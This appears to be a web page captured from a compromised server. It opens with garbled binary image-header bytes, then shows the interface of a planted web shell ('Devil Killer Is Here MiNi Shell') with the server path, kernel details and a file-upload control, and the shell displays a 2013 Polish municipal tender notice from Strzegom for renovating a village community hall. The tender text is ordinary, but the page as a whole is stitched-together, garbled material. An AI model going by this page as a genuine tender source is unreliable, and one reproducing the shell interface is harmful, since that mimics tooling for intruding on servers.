JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131029/226687-N-2013.html

<p class="kh_header"><b>Strzegom: Remont  świetlicy wiejskiej w Olszanach z przebudową części pomieszczeń na kotłownię, wykonaniem instalacji c.o. i wymianą instalacji elektrycznej</b><br>
<b>Numer ogłoszenia: 226687 - 2013; data zamieszczenia: 29.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  świetlicy wiejskiej w Olszanach z przebudową części pomieszczeń na kotłownię, wykonaniem instalacji c.o. i wymianą instalacji elektrycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na przebudowie części pomieszczeń w celu ich adaptacji na kotłownię i skład opału, wykonaniem instalacji c.o. 
i wymianą instalacji elektrycznej oraz remoncie budynku świetlicy wiejskiej we wsi Olszany 
w gminie Strzegom. 

2.	 Przedmiot zamówienia obejmuje między innymi :
1)	Roboty rozbiórkowe, wyburzeniowe i demontażowe,
2)	Roboty murowe,
3)	Roboty posadzkarskie,
4)	Osuszanie i odgrzybianie murów,
5)	Roboty tynkarskie i okładzinowe,
6)	Roboty renowacyjne, 
7)	Wykonanie kominów i przewodów spalinowych i wentylacyjnych
8)	Wykonanie nadproży,
9)	Demontaż i montaż stolarki,
10)	Wykonanie instalacji sanitarnej wraz z montażem nowych urządzeń i armatury sanitarnej,
11)	Wykonanie nowej instalacji c.o. wraz z montażem kotła,
12)	Wykonanie sufitów podwieszanych,
13)	Czyszczenie powierzchni z powłok malarskich (farba olejna),
14)	Roboty malarskie,
15)	Roboty izolacyjne i dociepleniowe,
16)	Roboty remontowe drewnianych elementów konstrukcyjnych stropu nad strychem,
17)	Roboty remontowe konstrukcji stalowej dachu,
18)	Wykonanie obróbek blacharskich,
19)	Montaż klapy stalowej wyłazowej na strych wraz z montażem stalowych klamer 
i obręczy zabezpieczającej wejście na strych,
20)	Remont podłogi z parkietu (cyklinowanie i lakierownie)
21)	Wykonanie instalacji elektrycznej (nowa wewnętrzna linia zasilająca, instalacja oświetleniowa, instalacja oświetlenia awaryjnego, instalacja gniazd wtykowych, wyłącznik główny prądu, instalacja ochrony przepięciowej)

UWAGA: Oprócz zakresu robót zawartego w projekcie budowlanym i wykonawczym  należy dodatkowo wykonać roboty polegające na przemurowaniu pęknięć komina na wysokości ok. 7 mb, wyczyszczenie przewodów z gruzu oraz zlecenie dokonania przeglądu kominiarskiego. 

3.	Szczegółowy zakres robót  zawarty jest w projekcie budowlanym i wykonawczym oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, które stanowią  podstawę do sporządzenia oferty. Roboty ujęte w dokumentacji, a nie ujęte w wycenie oferty nie będą  traktowane jako roboty dodatkowe i nie będą finansowane przez Zamawiającego.

4.	Zamawiający posiada decyzję Nr 1373/2012 z dn. 8.11.2012 r. o pozwoleniu na budowę wydaną przez Starostę Świdnickiego, która obejmuje przebudowę pomieszczeń na kotłownię, wykonanie c.o. i wymianę instalacji elektrycznej w obiekcie natomiast na pozostałą część robót związaną z remontem budynku Zamawiający dokonał zgłoszenia robót budowlanych 
w Starostwie Powiatowym w Świdnicy.

5.	Przedmiar robót należy traktować jako element dodatkowy, jedynie ułatwiający sporządzenie oferty. Przedmiar robót nie może stanowić podstawy do wyceny przedmiotu zamówienia.

6.	Ponieważ inwestycja jest realizowana z udziałem środków Europejskiego Funduszu rolnego w ramach działania - Odnowa i rozwój wsi - objętego Programem Rozwoju obszarów Wiejskich na lata 2007-2013, po zakończeniu zadania Wykonawca jest zobowiązany wykonać i przekazać Zamawiającemu kosztorys różnicowy.

7.	Wykonawca zobowiązany jest do informowania z odpowiednim wyprzedzeniem dysponentów sieci (m.in. Zakład Energetyczny) o zamierzonych terminach rozpoczęcia robót związanych 
z w/w sieciami. Po wykonaniu zakresu prac, lecz przed ich zakryciem, należy je zgłosić do odbioru wpisem do dziennika budowy oraz uzyskać protokolarny odbiór potwierdzony przez przedstawiciela zakładu branżowego. Wykonawca zobowiązuje się do ścisłej współpracy 
z dysponentami sieci podczas wykonywania przez nich prac przyłączeniowych.

8.	Zakres robót oraz odpowiedzialność Wykonawcy w zakresie objętym ceną ofertową obejmuje także:
a)	organizację, wygrodzenie, zabezpieczenie, ubezpieczenie i zagospodarowanie terenu budowy,
b)	zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów,
c)	doprowadzenie placu budowy do należytego stanu i porządku, wywiezienie gruzu na składowisko odpadów komunalnych i utylizację odpadów budowlanych po zakończeniu robót,
d)	wykonanie i przekazanie instrukcji bezpieczeństwa pożarowego obiektu,
e)	wyposażenie obiektu w sprzęt p.poż i oznakowanie zgodnie z instrukcją bezpieczeństwa pożarowego,
f)	wykonanie i dostarczenie instrukcji eksploatacji kotłowni oraz przeprowadzenie szkolenia w zakresie użytkowania kotłowni

9.	Użycie w dokumentacji projektowej i specyfikacjach technicznych nazwy (marek) wyrobów budowlanych, urządzeń czy technologii konkretyzującej producenta należy traktować, w myśl art. 29 ust.3 ustawy Prawo zamówień publicznych, jako informację na temat oczekiwanego standardu i poziomu jakości, a nie ściśle jako wymóg użycia konkretnego wyrobu. Możliwe jest zastosowanie innych równoważnych wyrobów budowlanych, urządzeń i technologii, których zastosowanie zagwarantuje spełnienie 
warunków podstawowych, o których mowa w art. 5 ust. 1 pkt 1) Prawa budowlanego oraz zapisów ustawy o wyrobach budowlanych, a także pozwoli na zachowanie równoważnego standardu i poziomu jakości, nie gorszego od określonego 
w dokumentacji projektowej, po uprzedniej akceptacji Zamawiającego. 

10.	Wykonawca powinien sprawdzić, czy dostarczone projekty są kompletne  i czy nie zawierają wad lub błędów dających się wykryć przy zachowaniu poziomu należytej staranności. Ujawnione  w projekcie ewentualne pomyłki i błędy, wykryte w trakcie realizacji robót budowlanych, należy bezwzględnie zgłaszać  Zamawiającemu w celu dokonania odpowiedniej weryfikacji oraz naniesienia przez Projektanta stosownych zmian. Ujawnione błędy nie mogą być wykorzystane przez Wykonawcę do nieprawidłowego wykonania i realizacji robót budowlanych, niezgodnego z obowiązującymi przepisami techniczno- budowlanymi i  sztuką budowlaną.

11.	Przy zamawianiu wyrobów budowlanych i urządzeń przewidywanych do wbudowania 
w obiekcie stanowiącym przedmiot umowy, firmy i podwykonawcy składający oferty są zobowiązani do dokonania niezbędnych pomiarów z natury bezpośrednio na budowie, 
w miejscu, w którym wyroby i urządzenia mają być zastosowane lub wbudowane. 
W przypadku stwierdzenia w trakcie obmiarów kolizji  z innymi elementami lub instalacjami, fakt ten należy zgłosić  Zamawiającemu w celu wprowadzenia rozwiązania zamiennego 
w porozumieniu z Projektantem.

12.	 Zamawiający wymaga bezwzględnej obecności na budowie co najmniej kierownika robót posiadającego właściwe uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej w każdy dzień roboczy, w którym prowadzone będą roboty budowlane.

13.	Roboty należy prowadzić zgodnie z przepisami Prawa budowlanego i przepisami BHP.

14.	Wymaga się, aby na wykonany przedmiot zamówienia, w tym również  na zastosowane wyroby budowlane i urządzenia, Wykonawca udzielił gwarancji jakości i rękojmi za wady minimum na okres 36 miesięcy od dnia sporządzenia protokołu odbioru końcowego wykonanego przedmiotu umowy, za wyjątkiem urządzeń, na które ich producenci udzielili dłuższego okresu gwarancji. Wówczas okres gwarancji liczony będzie według gwarancji producenta. Roszczenia z tytułu gwarancji jakości nie wyłączają odpowiedzialności Wykonawcy z tytułu rękojmi za wady przedmiotu umowy. Wykonawca udziela Zamawiającemu na cały przedmiot umowy rękojmi za wady na okres równy okresowi gwarancji jakości. 

15.	Zamawiający zastrzega, że wszystkie materiały i urządzenia użyte do wykonania 
i wykończenia podlegają jego bezwzględnej akceptacji przed wbudowaniem.

16.	Wykonawca zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności, w tym za szkody i następstwa nieszczęśliwych wypadków powstałych w związku z prowadzonymi pracami, na kwotę nie niższą niż wartość kontraktu brutto.

17.	Rozliczenie robót odbędzie się na podstawie maksymalnie 3 faktur częściowych i ostatniej końcowej, która będzie opiewać na kwotę nie mniejszą niż 10% wartości wynagrodzenia za wykonanie przedmiotu zamówienia. Pierwsza faktura może zostać wystawiona po 10.01.2014r.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane polegające na budowie, przebudowie, rozbudowie lub remoncie budynku o wartości co najmniej  500.000,00 zł netto każda.

Wykonawca musi wykazać, że roboty zostały wykonane w sposób należyty oraz zgodny 
z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami  posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:
a)	kierownik budowy posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, 
b)	kierownika robót w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych, 
c)	kierownika robót w specjalności instalacyjnej w zakresie instalacji elektrycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 300.000,00 zł.


1.  Potwierdzeniem spełnienia warunków będzie złożenie dokumentów i oświadczeń. Z treści złożonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez Wykonawcę wymaganych warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez Wykonawcę dokumentów 
i oświadczeń na zasadzie spełnia warunek/nie spełnia warunku. 

2.  Dla potrzeb oceny spełnienia warunku dot. wiedzy i doświadczenia, w przypadku gdy wartości zostaną podane w walutach innych niż PLN,  Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.            

3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami      niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie musi wskazywać przekazane zasoby (rodzaj i ilość, wskazywać okres na jaki zostają przekazane oraz formę stosunków prawnych łączących Wykonawcę z tymi podmiotami wraz z załączeniem stosownej umowy/porozumienia). 
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego warunki spełniają łącznie, natomiast każdy z wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie 
art. 24 ust. 1 ustawy Pzp.

5. Wykonawcy wspólnie ubiegający się o zamówienie:
1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2)	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do
 podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność 
z  oryginałem wszystkich dokumentów,
3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem,
4)	jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców, 
5)	Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako reprezentant pozostałych (liderem),
6)	Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.

6. Przy składaniu oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - może być złożona przez jednego z nich lub złożone dokumenty mogą potwierdzać łączne spełnienie warunku posiadania środków finansowych lub zdolności kredytowej w wysokości co najmniej 300 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>co najmniej dwie roboty budowlane polegające na budowie, przebudowie, rozbudowie lub remoncie budynku o wartości co najmniej  500.000,00 zł netto każda.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy, która zawarta będzie z Wykonawcą stanowi załącznik nr 5 do SIWZ. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach, jak w projekcie umowy.
2.  Zgodnie z postanowieniami art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. 
W szczególności Zamawiający dopuszcza: 
1)   aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.;
2) zmiany terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub          
Zamawiającego, które to przyczyny każda ze Stron musi udokumentować w tym m.in.: 
      - spowodowane nieprzewidzianymi w SIWZ nadzwyczajnymi warunkami jak: niewypały 
i niewybuchy, wykopaliska archeologiczne i inne przyczyny zewnętrzne skutkujące obiektywną niemożliwością prowadzenia prac lub wykonywania innych czynności;
      - spowodowane koniecznością usunięcia istotnych błędów lub wprowadzenia istotnych zmian w dokumentacji projektowej - nie ujawnionych przed wszczęciem postępowania 
o udzielenie zamówienia publicznego;
      - spowodowane wystąpieniem robót zamiennych lub dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego - jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego;
      - będące następstwem wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy lub będące następstwem działania organów administracji 
i innych podmiotów o kompetencjach zbliżonych do organów administracji, 
w szczególności eksploatatorów infrastruktury;
3)  zmianę umowy w przypadku zmiany przepisów prawa obowiązujących na dzień zawarcia umowy w  zakresie mającym wpływ na realizację umowy, w tym zamiany ustawowej stawki podatku od towarów i usług VAT, prowadzącej do zmiany kwoty brutto;
4) zmianę sposobu wykonania Umowy w razie, gdy jest niezbędna ze względów       technicznych, technologicznych lub organizacyjnych, o ile zmiana taka jest korzystna dla      Zamawiającego lub konieczna w celu prawidłowego wykonania Umowy, a brak zmiany     sposobu wykonania umowy skutkowałby niewykonaniem lub wadliwym wykonaniem przedmiotu  umowy pod warunkiem, że Wykonawca lub Projektant zaoferuje rozwiązania     techniczne, technologiczne lub organizacyjne o równoważnych lub lepszych parametrach;
5) zmianę umowy w zakresie kluczowego personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze;
6) zmianę umowy w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego: możliwe jest powierzenie podwykonawcom innej części robót niż wskazana w ofercie wykonawcy, 
a także możliwa zmiana podwykonawcy na etapie realizacji robót o ile nie sprzeciwia się to postanowieniom SIWZ;
7) zmianę umowy w zakresie robót zamiennych i robót zaniechanych, jeżeli wystąpią okoliczności określone w § 2 umowy.

3. Warunki dokonywania zmian:
1)	inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego,
2)	uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
3)	zmiany umowy, o których mowa powyżej  muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3  ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych   (Dz. U. z 2013 r. poz. 907 ze zm.) stanowiącego, że umowa podlega unieważnieniu 
w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ,
4)	forma pisemna jako aneks do umowy pod rygorem nieważności.
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
